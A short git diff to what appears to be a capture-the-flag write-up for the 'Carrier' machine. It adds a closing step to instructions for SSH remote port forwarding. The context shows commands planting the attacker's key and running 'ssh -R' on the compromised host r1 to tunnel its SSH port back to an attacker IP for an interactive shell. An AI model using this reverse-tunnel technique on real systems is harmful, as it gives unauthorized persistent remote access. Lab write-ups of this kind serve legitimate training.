remote port forwarding

--- a/_posts/2019-01-12-Carrier.md
+++ b/_posts/2019-01-12-Carrier.md
@@ -262,6 +262,9 @@ Moving on, the attacking system's public SSH key can be copied to the `authorize
 2. If necessary,  start the SSH service on the attacking machine with `service ssh start`.
 3. Issue `ssh -f -N -R 2222:localhost:22 root@10.10.14.5` on `r1`. This command opens up port `2222` on the attacking system and forwards the target system's port `22` to the attacking system's port `2222`. Note that `10.10.14.5` is the attacking system's IP in this example.
 4. Issue `ssh root@locahost -p 2222` to connect to the SSH service on port 22 of `r1`
+5. Enjoy the fully interactive terminal session
+
+
 
 
 
